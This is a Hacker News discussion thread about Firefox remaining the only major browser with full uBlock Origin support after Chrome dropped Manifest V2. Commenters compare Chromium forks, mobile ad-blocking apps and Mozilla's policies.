        Last time i tried to skim through a longer video on non ad blocked youtube i got two ads every time i skipped. Ended up watching more ad than video... at least until half way through it when I gave up.

        And even if you watch one without skipping I'm not sure the amount of ads is even legal in my jurisdiction.

        Pay for Youtube premium you say? But I only use it like once per month anyway. Easier to just not try.

    • matgessel

      I got a Android tablet...I can't recommend it. YT has gotten pretty toxic with the dark patterns. There are the usual interstitial ads, but after you skip and go full screen there's another ad widget in the lower left of the video. You have carefully navigate a popup menu to dismiss it without triggering an ad popup. If you pause or double-tap to -10s the video it restores down and shows an ad on the right side.

      The Edge browser for has the best ad-free experience I've found so far on Android. It supports Widevine (DRM videos) and performance is good enough for most videos. I do get an occasional stutter with higher res videos. Firefox supports Widevine, but it didn't last week? Or I just didn't get the popup to "Enable DRM" for some reason. Edge claims to have blocked 15k YT ads in the last week with the built-in AdBlock Plus. It works with uBlock Origin as well (this week anyway).

      • bardan

        NewPipe is a YT frontend that blocks ads, allows downloading, can run in the background and is generally great. It's a killer app for Android in my opinion.

        https://github.com/TeamNewPipe/NewPipe

        • WickyNilliams

          Second recommendation for newpipe. Fantastic app. I love that you can still have "subscriptions", playlists etc without an account. Set it as the default app for youtube.com and related domains and you'll never look back

      • ndriscoll

        Firefox works fine on Android, and supports ublock origin and playing youtube in a background tab/with screen off. Couldn't speak to DRM as I've never used it on any platform.

      • jochem9

        On Android you can still patch the YouTube apk with Revanced and get rid of ads (and you can enable sponsorblock, etc).

  • lern_too_spel

    But you see crypto ads in the browser's own settings.

    • stack_framer

      Nope. I made the one-time payment for Brave Origin.

      • lern_too_spel

        Meanwhile, Firefox derivatives are completely free with no ads and don't support the crypto grifts industry or removing rights from gay people.

rasz

Vivaldi 8.1 still supports it (Chromium 150) as loaded unpacked extension.

Edit: and latest August 14, 2026 Chromium 152.0.7977.38 based Snapshot https://vivaldi.com/blog/desktop/address-field-calculator-an... has this in patch notes:

"[Extensions] Re-enable and extend Manifest V2 extension support for the time being (VB-130324)"

  • rwz

    I wouldn't be sure this is a long term solution. Maintaining a this into perpetuity would probably take a lot of resources that Vivaldi team might not have.

    • yborg

      Unless upstream introduces breaking changes I don't see why not. Google was killing this functionality for policy reasons, not because changes to the renderer required it or something. And LLM analysis is going to make maintaining forks easier going forward.

    • rasz

      For all possible MV2 extensions this is unsustainable for a small company. Supporting just uBO used by tens of millions of people? pretty doable as it only relies on few hooks into C functions that arent going anywhere.

WhyNotHugo

Qutebrowser seems to _want_ uBlock Origin-style filtering, but development on the feature has been ongoing for a long time and seems to have somewhat stalled: https://github.com/qutebrowser/qutebrowser/pull/7629

timetraveller26

Firefox, after 20 years, once again has an advantage over the other browsers.

Let's hope for new generations to get tired of so many ads to finally ditch chrome.

  • matheusmoreira

    Unfortunately, new generations seem to be completely fine with this. People in general, they're just so completely captured by the dark patterns that I get the impression they cannot even imagine a world without them.

    I install uBlock Origin on every browser I come across. Everybody notices. The internet just feels better, somehow. People can't quite explain what changed, but they know.

  • BeetleB

    It's funny. Over 20 years ago, I got people to switch to Firefox because of the AdBlock extension.

    In case people don't know, Firefox was the first major browser to even have extensions.

    • Izkata

      Also, Firebug showed what was possible with developer tools. Inspecting elements or network requests or whatever else wasn't really a thing before that extension.

    • doubled112

      There is only XUL!

      • inigyou

        Long dead. Now there is no XUL, only (private user) data (that Mozilla sells for revenue)

        • KingMob

          I think they're making a Ghostbusters joke, btw

          • inigyou

            Mozilla made the joke themselves, about Firefox. "There is no data, there is only XUL" was an official XUL catchphrase. But now there is no XUL, and Mozilla sells private user data, so it's reversed.

  • bananamogul

    I wonder if new generations will just get better and better at visually blocking off ads when they read. So many layouts are so common that I read a lot of sites and have absolutely no idea what ads they're running because 30-odd years of browsing rendered HTML pages has trained my brain to block off and not process certain areas of the page.

    I'm not an advertising apologist, just pointing out that I can remember what ads were on a freemium TV station I watched two nights ago and what ads were on a radio station I listened to this afternoon but I can't remember a single web ad since...I don't know when. This might be because the TV ads have audio and visual, and with radio my alternative at the moment was looking out the window of my car, but web ads just seem very easy to mentally filter.

  • ImJamal

    uBlock Origin Lite works decently on Chrome so I doubt this will help migration to Firefox.

    • Andrex

      Exactly. The difference between the two is not qualitatively different for 99% of users.

      • sys_64738

        I noticed that UBO Lite doesn't cause the ad boxes to vanish like UBO does. You see this on the likes of the weather.com webpage.

        • culi

          Exactly. The Lite version is basically "hiding" ads rather than blocking. The MV2 version stops the requests themselves from being made which save your bandwidth and battery. The light version lacks those benefits

          • Andrex

            Advertisers get to pretend their ads are being seen.

            Websites get paid.

            Users don't see ads.

            Sounds like a win-win-win?

            • culi

              Users are still being tracked and your websites are still slower to load. More of your bandwidth and CPU is being used.

              If you want a sophisticated version of what you think this is, see Ad Nauseum. It's uBlock Origin except they create a fake "profile" for you and selectively click ads under the hood to throw advertisers off

        • kevin_thibedeau

          That's manifest V3 working as intended.

    • timbit42

      It doesn't block tracking.

  • drewfax

    New generations don't 'browse' web anymore. They 'consume' YouTube, Instagram, Android TV and other walled gardens. These generation don't even know they could change contents being displayed on their device to their wish. For them it's just whatever the app shows. They don't understand Web, extensions, DNS etc. I don't have hope for new generations. We're are the old men now yelling at AI and App Stores.

  • odidiejdiwjd

    If only they focused on making Firefox the definitive good browser instead of a platform for their AI efforts.

    Firefox will never convince people to leave chrome on philosophy alone. I detest Chrome with a passion and refuse to touch it with a ten-foot pole, but cannot in good faith recommend Firefox to anyone in today’s world. “It kinda works” is about as far a compliment you can give it.

    • cadamsdotcom

      "It kinda works" is factually incorrect.

      I have used Firefox exclusively every day on macOS for the past year, several hours a day, and have not one single time had to open another browser. None of the customers of my B2B saas use Firefox. Not once have I needed to test in their browsers except quick smoke testing to prove to myself that the rendering and details are identical. All my other browsing is indistinguishable from before when I used Chrome, and from on mobile where I (tragically) am forced by Apple's monopoly to use Safari.

      Do you have evidence to support your false claim?

      • jjav

        Agreed, I can't understand where these experiences come from.

        I only ever use Firefox, at work, at home, mobile. Since forever, as long as there has been a Firefox (and Mozilla before that, Netscape prior).

        There was one time about 8-10 years ago that I encountered a site that didn't work in Firefox, was some weird proprietary training module at work.

        So yes, I did encounter one site that didn't work in Firefox in the last ~20 years. One.

        • sensanaty

          I genuinely wouldn't be surprised if it was Google astroturfing every single thread relating to FF. Yes, Mozilla isn't perfect and had some questionable decisions, but we're somehow okay with the worse option out of the two? Somehow, Mozilla's decisions are enough to never use FF, but Google's infinitely many horrible ones are acceptable for.... What reason?

          • Capricorn2481

            > Somehow, Mozilla's decisions are enough to never use FF, but Google's infinitely many horrible ones are acceptable for.... What reason?

            I think these people are real and predate AI. I think it comes down to a fundamental psychology in how the two browsers are marketed online. Firefox users would say "Firefox is better than Chrome." Chrome users would say "Chrome is good." Firefox is touted as a better browser on the principle of the freedom it gives its users, and paradoxically, that draws heavy scrutiny.

            I don't think I am doing a Goomba fallacy here. People that claim to care about privacy and browser freedom will express disgust with Mozilla then, in the same breath, say they are opting into Chrome out of spite, which is 100x worse.

            • jjav

              > say they are opting into Chrome out of spite, which is 100x worse.

              That is what is frustrating, indeed.

              Firefox is not perfect. Nothing is perfect. There have been changes in Firefox over the years that I don't like. (I'm still hurting from it moving the tabs to the top, so annoying.)

              In a scale of 1 (100% user-hostile) to 10 (absolutely perfect user-centered browser), Firefox only scores a, let's say, eight.

              But chrome scores a solid 2, so obviously I'm not going to use it, ever, no matter if Firefox makes the occasional mis-step.

              • picofarad

                I concur that it is strange seeing the FF/Mozilla vs chrome arguments. Its almost as if some large percentage of users here relied on web ads for their income.

                Weird!

                • Capricorn2481

                  I would imagine a very small number of people on here rely on ads for income, but I could be wrong. That's just not the shape of company most devs work for.

      • odidiejdiwjd

        Just take a look at some other people kinda trying to refute me but confirming my point that there’s an increasingly frustrating wave of websites and features that simply refuse to work on Firefox (or Firefox+Linux).

        I know when you’re balls deep in your own little box it’s hard to see the cracks in the foundation. But they’re very much there.

        • cadamsdotcom

          > Just take a look at

          > some other people

          "Look around, it's everywhere" isn't evidence, it's misdirection.

          I will not be made to go find evidence of your false claim. That's on you.

    • kulahan

      What do you think doesn’t work on Firefox? Aside from Google products purposely crippled, everything works just fine in my experience. It’s fast and stable. If there’s a bunch of AI stuff in it, I’ve not seen it. Of course I believe it exists, I just don’t ever read popups anyways. To be fair, I probably use 5% of the browser’s capability (I imagine many are like me). I browse websites and I have UBO installed.

      • BeetleB

        In the last few months, I've seen a huge upsurge of sites that simply won't work for me in Firefox.

        Not sure if it's the FF + Linux combination. Should probably try with a fresh profile to confirm.

        It sucks, but I'm in on FF all the way. If much of the web stops working for me, it just means I have more time on my hands!

        • Silhouette

          Anecdotally my own experience is consistent with this with the same platform+browser combination.

          It appears that there are now significant numbers of sites - or at least noticeable parts or features of sites - that rely on Google-specific APIs and haven't been tested on other browsers.

          However visiting those sites from Apple devices is often similarly frustrating. I'm not sure this is an anti-Firefox thing. It seems more of a not realising there are other browsers apart from Chromium-based ones thing.

          • deweywsu

            I kinda wondered myself if this was some kind of coordinated effort to make Firefox not work. It wouldn't surprise me if it was later discovered that Google paid some Linux subsystem maintainer to slip in some nefarious code somewhere that altered the way Linux implements rendering specifications ever so slightly such that Firefox appeared broken. Just the conspiracy theorist in me.

        • Izkata

          Slack "huddles" (video chat) work on everything except Firefox+Linux. Haven't tried changing my user agent yet, only just got onto Slack for work.

          • cwel

            This one is specifically Linux (Wayland). if you set your user agent to Macintosh it will work; or at least it did a few months ago when I came across this. I've since resigned to using the electron bundle.

            Google meet, Discord, Zoom all handle Mozilla/Linux. Slack hasn't figured it out yet.

        • kevin_thibedeau

          You can change your UA and add Sec-CH-UA to match Chromium if you want to avoid the (non-ADA compliant) browser bias.

        • nickthegreek

          name any of them?

    • jasonpeacock

      What doesn’t work? It’s my daily driver and it renders every website I visit.

    • rwz

      I daily Zen (Firefox under the hood) and the only thing that I consistently need to open other browsers for is direct USB support (mouse/keyboard drivers in the browser). Other than that, I don't remember when was the last time something wasn't working in Firefox.

alentred

It is worth mentioning that there are other options like NextDNS and similar, which complement uBO(L) nicely.

bossyTeacher

The title misses something more important: Firefox is and has been for a very long time the only browser who wasn't made by people trying to extract profit from you.

Everything follows from this. Edge people, Chrome people have been living in a fairytale for believing that the keepers of their portal to the web were offering a product as complex and expensive as a browser without asking for anything in return.

Anyone knows that any company that gives you something for free will eventually want something from you. You accepted a free browser from a for-profit entity and paid nothing. Now, Faust has come to collect your soul.

  • shooly

    > Anyone knows that any company that gives you something for free will eventually want something from you

    Firefox is also free.

    • bossyTeacher

      Mozilla is not a company though.

      • shooly
        • bossyTeacher
          • shooly

            ... and so what? Your response was that they're not a company - Mozilla Corporation IS a private, for-profit company and one of their responsibilities is managing Firefox. Similar structure is used by OpenAI, so I guess OpenAI is also not a company?

            • bossyTeacher

              So the top-most entity is the Mozilla Foundation, they control and dictate what the subsidiary, also called Mozilla, can and cannot do. The OpenAI foundation cannot dictate what OpenAI Corp can and cannot do.

              1. Mozilla isn't working in a capital intensive domain like Transformer Tech unlike OpenAI so there is no need to bend over demands this much.

              2. Mozilla Corp is fully owned by Mozilla Foundation. OpenAI Corp was created by the OpenAI non profit to take external investment. The OpenAI non profit chose to give chunks of the OpenAI Corp to investors because it needed money. By selling stakes, they gave control of the company away. That's the difference.

              3. OpenAI Corp answers to their stakeholders of which OpenAI foundation is only one and a minor stakeholder. Mozilla Corp answers to Mozilla Foundation only. That's the difference.

              4. Presentation. The mozilla websites for the foundation and the subsidiary both use the org domain which is used by non profits, unlike openain's com use. Not a rule but a choice in presentation.

              There is no comparison here.

mindcrash

Chromium still has MV2 support in the extension loader as of the current state of the Chromium repository at https://chromium.googlesource.com/.

This means that both Microsoft and Google have elected to disable support at build time and alternative, good, Chromium based browser like Helium (https://helium.computer) still support it. As a matter of fact Helium still uses it to fetch and run uBlock Origin out of the box for mitigation against trackers, malware and ads.

frogperson

Just a reminder to everyone to support weird and new browsers. we'll never get a new crop if we don't water and nurture the alternatives.

  • qweqwe14

    For sure everyone will start using "weird and new" browsers that waste their time by breaking websites xD

    Chromium is an open source project, forks such as Ungoogled Chromium exist, I literally had 0 issues with uBOL on Ungoogled Chromium.

    People who complain about MV3 probably spent more time complaining about it than actually trying uBOL and seeing that it works just fine.

zarzavat

I don't know why with LLMs we can't just add MV2/blocking web request support to Chromium in a fork.

The argument against was always that it's "too hard to keep a fork in sync". Now it's easier.

  • culi

    That's basically exactly what Brave (the only Chromium browser still supporting uBO) is doing to support uBlock Origin. But it's flimsy and likely has an expiration date.

    • zarzavat

      AFAIK they are using the built-in support which Google still maintains even if they don't expose it.

      My point is that when MV3 was announced there was an assumption that maintaining a Chromium fork to continue supporting MV2 would be too much work and too expensive. But now with LLMs that's no longer a safe assumption. The non-Chrome chromium based browsers can fork chromium and add back MV2. No need for any expiration date.

      • culi

        It's not because of LLMs. It's because Google only stripped MV2 support but didn't strip the webRequest API that is at the center of this whole thing. It's pretty simple to maintain a fork that just supports the MV2 standard if the APIs are still there. If Google ever decides to finally remove the API, it would certainly be a much larger challenge

      • hgomersall

        Or you could just use Firefox.

        • zarzavat

          The only reason that Google keep Firefox around is because they find it beneficial for antitrust reasons.

          We should prepare for a future without Firefox, because one day it won't be there anymore.

Madmallard

Do people not remember Firefox changing their terms of service last year and allowing them to sell your data to third parties? I don't get it did people forget?

I switched over to LibreWolf and other browsers like that then and never looked back.

  • culi

    They rewrote the terms almost immediately after the backlash. They also claimed the original terms were written in response to the overly broad legal definitions of "data sales" under laws like the CCPA. Which tbh sounds reasonable

    • Madmallard

      proof?

      • culi
        • Madmallard
          • culi

            Lol I this is internet inception. You, someone who didn't read any of the articles, linked to a reddit post. The reddit post is of an article that is full of confused redditors who also didn't read the article. The article's very first sentence says:

            > After fielding user backlash over its new Terms of Use last week, Firefox browser maker Mozilla has rewritten its policy to address issues around the overly broad language it had previously used.

            The next two sentences:

            > Critics said the terms implied Mozilla was asking users for the rights to whatever data they input into the browser or upload, which some worried would be then sold to advertisers or AI companies.

            > Mozilla said that was not the case, noting that the new terms didn’t represent a change in the way the company used data. The company also said that the original language updates were not “driven by a desire” to sell user data, and that the company’s ability to use collected data was still limited by the rights laid out in Firefox’s Privacy Notice.

            Buddy, please save us both some time and actually read the articles...

            • Madmallard

              The language is still ambiguous enough to cause issues. That's why Louis Rossman said just download Librewolf and be done with it.

  • inigyou

    We all just either memory-holed it or convinced ourselves that it wasn't what it was. Easy to think you just misunderstood what they said, even though they were very explicit about it.

  • ethagnawl

    I'm not sure why you're being downvoted; you're right. Firefox the browser is an amazingly capable tool but I wish it was shepherded by an org that prioritized its users' interests (privacy, performance, etc.) instead of ramming AI, crypto or cute marketing campaigns that NOBODY wants into its flagship offering.

shevy-java

We need our own browsers. Relying on corporations does not work - they constantly betray and abuse us. Evidently Google is the number #1 troublemaker here, due to the addiction to adRevenue into adChromium, but you can replace this with any other private company and the basic problem will be the same.

We need a variant of the world wide web that can not be abused and controlled like Google shows right now. Firefox will not change anything anymore either.

  • yellowcakex

    Like this.

    Would you do something using their engine?

    Something like Ladybird?

    Or 1 fully from scratch like Medici on GitHub?

Markoff

1. Vivaldi supports uBlock Origin, if you consider Firefox a "major browser" then sure also Vivaldi and Brave are major browsers

2. while I use uBlock Origin on phone (Firefox) and desktop (Vivaldi), it's overrated, AdGuard works under MV3 AND unlike uBlock supports element picker, so if I was on browser not supporting uBO I would switch to AdGuard since I can't live without element picker

  • gorhill

    uBO Lite does support "element picker", it's called "Create a custom filter" in popup panel.

    • Markoff

      so I can click with cursor over element I don't want to remove it same way as in uBlock Origin?

      because without UI manually editing the filter is not an element picker.

      I'm unable to find any screenshot of ubol, all I found is some switch between protection levels and all answers I've found in Google to this question say there is no element picker and not going to install it since all my browser still support uBO

      • gorhill

        > all answers I've found in Google to this question say there is no element picker

        Because Google feeds on comments like yours to answer your question about whether there is an element picker, it's bound to be wrong.

        You can create your own custom filters using an element picker, and you can manually edit them. See <https://github.com/uBlockOrigin/uBOL-home/wiki/Quick-guide>.

        • Markoff

          Thanks for your great work, I didn't notice who I am talking to.

          Though it doesn't help even on official extension page in both Chrome web store and Microsoft edge add-ons store there is no clear screenshot showing this (tools dashboard after clicking More button few times), if there was clear screenshot of actual advanced/"More" UI with Element zapper/picker, users like me wouldn't have such stupid questions/assumptions and it would be clear from get go.

insin

It looks like Google constantly pushing "MV3 is more secure" messaging worked at the intended high level.

  • drewfax

    Now they are doing it to Android with mandatory developer identity verification and Play Integrity. I wonder how those engineers sleep at night.

deweywsu

It is possible to write your own extension and still use it in Chrome as long as it's not bundled. It would be a huge pain to get the source for uBlock origin and implement it locally yourself, but it might be worth the pain to block ads.

  • rwz

    The original uBO relies on Manifest V2, the API Chrome no longer supports. It's impossible to run full UBO (not Lite MV3 version) on current versions on Chrome.

    • rasz

      >It's impossible to run full UBO (not Lite MV3 version) on current versions on Chrome.

      Current version of Chrome seems to be 152.0.7977.39 released August 14, 2026.

      August 14, 2026 Chromium 152.0.7977.38 based vivaldis napshot https://vivaldi.com/blog/desktop/address-field-calculator-an... has this in patch notes:

      "[Extensions] Re-enable and extend Manifest V2 extension support for the time being (VB-130324)"

      • rwz

        Yeah, Vivaldi specifically is keeping MV2 alive for uBO it seems. We'll see how long they can maintain it with their small team.

search_facility

Great, this is unique trait and helpful one - Firefox is here to stay

ytoast

Are there any Chromium-based mod/plugin loaders out there? I mean something that uses the same DLL/SO hijacking or injection tricks game hackers use to build mod loaders, to expose a hooking layer for plugins.

darepublic

I fear that more and more sites increasingly serve different experiences based on things such as the presence of Adblock etc.

  • BarryMilo

    Not my experience at all. Ever since Google neutered ABP with this move, it feels like everyone else just gave up the arms race. Which makes sense give how little market share FF now has.

byra

Honestly whenever I need to use a browser without AdBlock at work I'm baffled that anybody can use this for regular day-to-day use.

It's borderline impossible to read some webpages.

Just one more reason to stay on FF I guess.

Especially since they launched extensions on mobile FF has been so much better than any of the alternatives I don't see myself going back anywhere else.

mancerayder

Can't I get the same thing with Brave though? I'm getting what feels like built in ad blocking.

DeusExMachina

What is the definition of major?

Globally, Firefox has ~2.2%.

On desktop alone that's still only 6.4%.

Where is the threshold?

marssaxman

Firefox is now the only major browser, because it supports uBlock Origin.

ck2

also Firefox is the last with widevine support which many video sites demand

all those chromium clones will not have widevine

(if youtube ever gets widevine, yt-dlp etc will never work anymore)

Firefox for the win, it needs guaranteed survival somehow

dyauspitr

It’s also the sole reason I use Firefox as my primary browser.

gdevenyi

Brave has the same style of engine built into the browser.

TomMasz

Monocultures suck.

PaulDavisThe1st

uBO + Steven Black hosts list + firefox. Peace, for now at least.

penchant

Sounds great, but doesn't this come at a price of maintaing the whole of MV2 support which is inherently insecure? If yes, then it's not a great look.

kazinator

Obligatory:

https://www.reddit.com/r/pcmasterrace/comments/137fwhc/the_i...

b3ing

You can also run Ad Nauseum if you want to

malomalsky

God bless Firefox!

neves

What about Brave?

CalRobert

Attestion (now via captcha) means that websites will presumably block Firefox and Google’s attempt to murder the web will be complete.

hugodan

Wait until google cuts their funding unless they cut the ad blockers

bethekidyouwant

Uhhh brave?

hamper653

The Web needs to die.

  • timbit42

    The way to do that is to build a better replacement that the web can't emulate.

lxe

What's preventing anyone to just spend some tokens and bring it back and fork Chrome? I think ungoogled Chromium still supports it, right?

  • fg137

    If you don't care about DRM content, bookmark syncing etc, sure, use a bare minimum chromium fork with the patch.

    But that's not what most users, including uBlock origin users, want.

socalgal2

I'm just waiting for Apple's OS level AI that lets me block ads in all apps, including the App Store

inigyou

Too bad Firefox isn't a major browser.

And it shouldn't be. It's now full of ads for Mozilla VPN and stuff. We need the engine, but not the browser.

  • picofarad

    I've never seen an ad for Mozilla VPN, nor any other Mozilla product, in Firefox.

    However I have seen billions of ads on google.com and YouTube.com, and search placement, and fraud.

    But whatever. How's google pay? Pretty good?

  • wookmaster

    The benefit of open source here is there are forked versions of it you can download.

  • 0dayz

    And who is going to finance that?

spottedmarley

Anyone can build a custom extension to do anything an extension is allowed to do. I had ~7 standard extensions that I pretty much always install into chrome browser. Over the past month or so I've been using Claude code to build a single custom extension that handles all of the things I used 7 extensions for previously. One extension does everything. You can even use the existing extensions you already use as guides for Claude to make sure all of the features you want are included. One extension to rule them all!

Keyboard Shortcuts

j
Next item
k
Previous item
o / Enter
Open selected item
?
Show this help
Esc
Close modal / clear selection